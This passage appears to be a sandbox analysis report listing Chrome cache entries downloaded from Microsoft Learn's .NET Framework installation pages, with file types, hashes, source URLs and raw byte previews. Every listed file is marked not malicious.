                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

                                                                                                                                                                                                                                          Chrome Cache Entry: 172

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                                                                                                                                                                          Chrome Cache Entry: 173

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

                                                                                                                                                                                                                                          Chrome Cache Entry: 174

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                                                                                                                                                                          Chrome Cache Entry: 175

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

                                                                                                                                                                                                                                          Chrome Cache Entry: 176

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33273), with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):33273
                                                                                                                                                                                                                                          Entropy (8bit):4.918756013698695
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
                                                                                                                                                                                                                                          MD5:86E84C732A96BF9CF18C99B48DB90B6D
                                                                                                                                                                                                                                          SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
                                                                                                                                                                                                                                          SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
                                                                                                                                                                                                                                          SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

                                                                                                                                                                                                                                          Chrome Cache Entry: 177

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

                                                                                                                                                                                                                                          Chrome Cache Entry: 178

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):19696
                                                                                                                                                                                                                                          Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                                                          MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                                                          SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                                                          SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                                                          SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
                                                                                                                                                                                                                                          Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]

                                                                                                                                                                                                                                          Chrome Cache Entry: 179

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):64291
                                                                                                                                                                                                                                          Entropy (8bit):7.964191793580486
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                                                          MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                                                          SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                                                          SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                                                          SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

                                                                                                                                                                                                                                          Chrome Cache Entry: 180

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

                                                                                                                                                                                                                                          Chrome Cache Entry: 181

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

                                                                                                                                                                                                                                          Chrome Cache Entry: 182

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}

                                                                                                                                                                                                                                          Chrome Cache Entry: 183

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):64291
                                                                                                                                                                                                                                          Entropy (8bit):7.964191793580486
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                                                                          MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                                                                          SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                                                                          SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                                                                          SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                                                                          Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

                                                                                                                                                                                                                                          Chrome Cache Entry: 184

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

                                                                                                                                                                                                                                          Chrome Cache Entry: 185

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
